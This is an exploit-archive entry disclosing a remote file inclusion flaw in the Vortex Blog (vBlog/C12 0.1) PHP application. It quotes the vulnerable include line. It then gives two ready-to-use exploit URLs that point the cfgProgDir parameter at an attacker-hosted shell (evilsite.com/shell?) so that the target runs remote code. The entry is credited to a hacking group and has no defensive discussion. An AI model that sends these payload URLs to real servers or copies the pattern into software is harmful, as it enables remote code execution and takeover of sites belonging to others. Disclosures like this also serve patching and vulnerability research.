vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

2006-11-08T00:00:00
ID 1337DAY-ID-1135
Type zdt
Reporter DeltahackingTEAM
Modified 2006-11-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
================================================================




**********************************************************************************************************

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Found by = Dr.Pantagon 

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

     include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
    http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

Special Thanks :  Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************


#  0day.today [2018-03-14]  #